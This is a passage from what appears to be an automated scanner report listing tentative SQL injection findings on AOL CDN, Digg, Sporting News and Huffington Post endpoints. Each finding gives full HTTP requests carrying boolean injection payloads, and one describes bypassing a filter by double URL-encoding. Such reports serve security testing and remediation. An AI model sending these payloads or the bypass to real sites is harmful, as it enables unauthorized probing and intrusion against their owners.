body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-pro-football-draft-guide-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/pro-football-draft-guide/2011/2011Draft1-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=7&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Pro Football Draft Guide Yearbook | 180x150');"></a>
</div>

Request 2

GET /services/sn-promos/yearbooks.php?113762307%20or%201%3d2--%20=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575176918-New%7C1367647176918%3B%20s_nrgvo%3DNew%7C1367647176919%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 01:30:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:31:59 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1280

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #yearbooks * { margin:0; padding:0; line-height:1em; }
#yearbooks, #yearbooks a { display:block; width:180px; height:150px; overflow:hidden; }
#yearbooks .middle { width:100%; height:100%; background:url(http://st.snimg.com/image/promos/yearbooks/2011-baseball-bg-180x150.png) no-repeat; }
#yearbooks .top { position:absolute; top:0; left:0; }
#yearbooks img.cover { margin:25px 0 0 12px; }
#yearbooks img.fade { margin:-50px 0 0 8px; }
#yearbooks a { position:absolute; top:0; left;:0; background:#fff; opacity:0; filter:alpha(opacity=0); }
</style>
<div id="yearbooks" class="ad-180x150">
<div class="middle">
<img src="http://st.snimg.com/image/yearbooks/baseball/2011/2011BB5-w100.jpg" class="cover" /><br />
<img src="http://st.snimg.com/image/promos/bg-fade-black.png" class="fade" />
<div class="top"><img src="http://st.snimg.com/image/promos/yearbooks/top-180x150.png" /></div>
</div>
<a href="https://www.streetandsmiths.com/index.cfm?fuseaction=store.covers&catid=1&year=2011" target="_blank" onclick="var s=s_gi('spnprod');s.tl(this,'o','PROMO CLICK | Baseball Yearbook | 180x150');"></a>
</div>

1.6. http://o.aolcdn.com/os/fanhouse/design/v2/css/fanhouse.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fanhouse/design/v2/css/fanhouse.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17216175'%20or%201%3d1--%20 and 17216175'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fanhouse17216175'%20or%201%3d1--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:36:02 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close

...[SNIP]...

Request 2

GET /os/fanhouse17216175'%20or%201%3d2--%20/design/v2/css/fanhouse.css?version=172 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1159
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:10:14 GMT
Date: Thu, 05 May 2011 01:09:44 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1159

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css</u></p><p><b>description</b> <u>The requested resource (Unknown File: /fanhouse17216175' or 1=2-- /design/v2/css/fanhouse.css) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.7. http://o.aolcdn.com/os/fonts/helvetica_lt_77_bold_condensed-webfont.woff [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 22210006'%20or%201%3d1--%20 and 22210006'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d1--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:47:14 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close

...[SNIP]...

Request 2

GET /os/fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006'%20or%201%3d2--%20 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1201
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:21:26 GMT
Date: Thu, 05 May 2011 01:20:56 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1201

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- </u></p><p><b>description</b> <u>The requested resource (Unknown File: /fonts/helvetica_lt_77_bold_condensed-webfont.woff22210006' or 1=2-- ) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.8. http://o.aolcdn.com/os/mobile-desktop/js/mobileblog.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/mobile-desktop/js/mobileblog.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14243832'%20or%201%3d1--%20 and 14243832'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/mobile-desktop14243832'%20or%201%3d1--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Mon, 05 May 2014 04:24:32 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Connection: close

...[SNIP]...

Request 2

GET /os/mobile-desktop14243832'%20or%201%3d2--%20/js/mobileblog.js HTTP/1.1
Host: o.aolcdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
ntCoent-Length: 1147
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 10:58:44 GMT
Date: Thu, 05 May 2011 10:58:14 GMT
Content-Length: 1147
Connection: close

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js</u></p><p><b>description</b> <u>The requested resource (Unknown File: /mobile-desktop14243832' or 1=2-- /js/mobileblog.js) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.9. http://o.aolcdn.com/os/realestate/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os/realestate/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 51809587'%20or%201%3d1--%20 and 51809587'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os/realestate51809587'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 14 Apr 2010 18:22:52 GMT
Content-Type: image/gif
Content-Length: 3488
Cache-Control: public, max-age=94670778
Expires: Sun, 04 May 2014 18:53:58 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close

...[SNIP]...

Request 2

GET /os/realestate51809587'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Cteonnt-Length: 1120
Cache-Control: public, max-age=30
Expires: Thu, 05 May 2011 01:28:10 GMT
Date: Thu, 05 May 2011 01:27:40 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 1120

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Unknown File: /realestate51809587' or 1=2-- /favicon.ico</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Unknown File: /realestate51809587' or 1=2-- /favicon.ico</u></p><p><b>description</b> <u>The requested resource (Unknown File: /realestate51809587' or 1=2-- /favicon.ico) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/5.5.25</h3></body></html>

1.10. http://o.aolcdn.com/os_merge/ [file parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Issue detail

The file parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the file parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d1--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:22 GMT
Date: Thu, 05 May 2011 01:18:22 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 122281

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(g,i,m){var n=i.location,f=g(m),j=encodeURIComponent,l=0,d,e={namespace:"aol-multiauth",devId:"ao1ARQUlqDsixdht",successUrl:n.protocol+"//"+n.hostname+"/_uac/authReceiver.html",tabs:["aol","aim","facebook","google","yahoo","twitter"],branded:0,reload:0,lang:"en",locale:"us",snsAuthenticated:0,snsServer:"http://my.screenname.aol.com",authServer:"http://api.screenname.aol.com"},a={namespace:"aol-getToken",devId:"ao1ARQUlqDsixdht",authServer:"http://api.screenname.aol.com",callback:function(){}},c,h=[],b=0,o=navigator.userAgent.toLowerCase(),k=o.indexOf("safari")!==-1&&o.indexOf("chrome")===-1;g.multiAuth=function(q){if(q.authLink){var p=g.extend({},e,q),v=p.namespace,B=p.authServer,E=p.snsServer,z=p.devId,r=p.successUrl,F=p.authLink,G=p.branded,H=p.lang,A=p.locale,y=p.selectedTab,x=p.snsSiteDomain,D=p.snsPopupSiteState||j("OrigUrl="+j(r)),C=p.snsIframeSiteState||j("OrigUrl="+j(n)),t=p.snsAuthenticated;g.multiAuth.devId=z;function w(R,S){function T(U){b=0;U.preventDefault();var V=[E,"/_cqr/login/login.psp?uitype=popup&sitedomain=",x,"&lang=",H,"&locale=",A,O?"&st="+O:"","&siteState=",D].join(""),W=[B,"/auth/login?devId=",j(z),M.length===1?"&idType="+M.toString():"&supportedIdType="+M.join(","),O?"&st="+O:"","&language=",H+"-"+A,"&f=qs&succUrl=",j(r)].join("");g.openWindow(x?V:W,{width:528,height:G?530:395})}function J(V){b=0;V.preventDefault();var U=[B,"/auth/logout?devId=",j(z),"&a=",j(d),"&language=",H+"-"+A,"&f=json&succUrl=",j(r),"&doSNSLogout=1"].join("");if(k){g.openWindow(U,{width:528,height:G?530:395,focus:0});i.focus()}else{g("<iframe/>").attr("src",U).css({border:0,margin:0,width:0,height:0}).appendTo("body")}}var K=R.response,L=parseInt(K.statusCode,10),M=S.tabs,O=S.selectedTab,I,Q="click.ma";if(L===200){var 
P=R.response.data.userData.attributes,N;if(!P.pictureUrl){N=P.providerDisplayName;if(!N||N==="Aol"||N==="Aim"){P.pictureUrl="http://expapi.oscar.aol.com/expressions/get?f=native&type=buddyIcon&t="+P.loginId}}f.trigger("token-success."+v,{key:z,response:R.
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery-1.4.3.min.js&file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.truncate-1.0.min.js&file=/aol/jquery.openwindow-1.0.min.js&file=/aol/jquery.shorturl.min.js&file=/aol/jquery.aolshare.debug.min.js&file=/aol/jquery.multiauth-1.0.min.js'%20and%201%3d2--%20&file=/aol/jquery.globalheader-1.5.min.js&file=/aol/jquery.globalsearchbox-1.5.min.js&file=/aol/aol.relatedvideo.min.js&file=/music/js/delegate.js&file=/music/js/jquery.twitter.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js&file=/aol/jquery.aolmostpopular.min.js&file=/music/js/feedback.js&file=/music/js/artist-legacy-hubs.js&v=5 HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Apr 2011 14:47:44 GMT
Content-Type: application/javascript
Cache-Control: public, max-age=3600
Expires: Thu, 05 May 2011 02:18:23 GMT
Date: Thu, 05 May 2011 01:18:23 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 118535

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...
;U.devId=(f.aolGetAuthToken.devId||devId);o(U)}})})}});n.replaceWith(G)}};f.fn.aolShare=function(l){return this.each(function(){l=l||{};l.elem=this;f.aolShare(l)})}})(jQuery,window,document);(function(a){a.fn.globalHeader=function(i){var d={activeTab:null,dualSearchBox:true,moreLinks:[],morePromoCount:2,moreText:"You might also like:",moreAnd:"and",moreMore:"More",moreTextHeadline:"More Sites You Might Like",webBaseUrl:"http://search.aol.com/aol/",webInv:"hdt-spinner",uiHat:"#head",uiWebForm:"#aol-header-search-form",uiWebInput:"#aol-header-search-input",uiWebButton:"#aol-header-search-icon",uiHatLinks:"#aol-header-links",uiHatTools:"#aol-header-auth-link",uiHatMorePopup:"#aol-header-more-list",uiNavLi:"li.nav-category",uiNavADd:".ad-728-90",auth:{doAuth:false,authenticated:false,authState:null,unauthState:null},search:{uiSearch:"#aol-header-search",params:{}},fn:{}},j={},f=this,g={},h={activeTab:null,moreLinksBuilt:false},c={init:function(k){g.$d=a(document);g.$c=a(k);g.hat=a(j.uiHat)[0];g.hatLinks=a(j.uiHatLinks)[0];g.$hatTools=a(j.uiHatTools);g.$webSearchForm=a(j.uiWebForm);g.$webSearchInput=a(j.uiWebInput);g.$webSearchButton=a(j.uiWebButton);g.$search=a(j.search.uiSearch);g.$searchInput=g.$search.find("input:first");g.$searchSubmit=g.$search.find("input:last");g.$navLi=g.$c.find(j.uiNavLi);g.$navADd=g.$c.find(j.uiNavADd);g.$hatMoreList=a(j.uiHatMorePopup);c.setActiveTab(null,j.activeTab);if(j.auth.doAuth){c.buildAuth()}if(j.dualSearchBox){b()}c.buildMoreLinks();c.buildDropDowns();g.$c.bind("setActiveTab",function(m,l){c.setActiveTab(m,l)});g.$c.bind("setAuthState",function(m,l){c.buildAuth(m,l)});if(j.search.params.initFocus!==undefined&&j.search.params.initFocus){g.$search.globalSearchBox(j.search.params)}else{g.$searchInput.bind("focus.aol-header",function(l){c.buildSearch(l)}).attr("autocomplete","off");g.$searchSubmit.bind("mouseover.aol-header",function(l){c.buildSearch(l)});if(j.search.params.searchText!==undefined&&j.search.params.searchText!==""){g.$sear
chInput.val(j.search.params.searchText)}}if(j.search.params.useCustomQuery===true){g.$searchInput.after('<input id="search-customvar" type="hidden" name="'+j.search.params.customQueryName+'" value="'+j
...[SNIP]...

1.11. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 1

HTTP/1.1 503 Service Unavailable
Content-Length: 62
Accept-Ranges: bytes
Date: Thu, 05 May 2011 01:23:55 GMT
Cache-Control: private, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-CDN: Cotendo
Connection: Keep-Alive

<html><body><b>Http/1.1 Service Unavailable</b></body> </html>

Request 2

GET /buttons/count?url=http%3A//techcrunch.com/2011/05/04/mashery-funding-2/%2527%2527 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response 2

HTTP/1.1 200 OK
Age: 0
Date: Thu, 05 May 2011 01:23:56 GMT
Via: NS-CACHE: 100
Etag: "54018d3f1db7e92a658590f8fbfc22adc1e471c2"
Content-Length: 101
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Thu, 05 May 2011 01:33:55 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://techcrunch.com/2011/05/04/mashery-funding-2/%27%27", "diggs": 0});

1.12. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

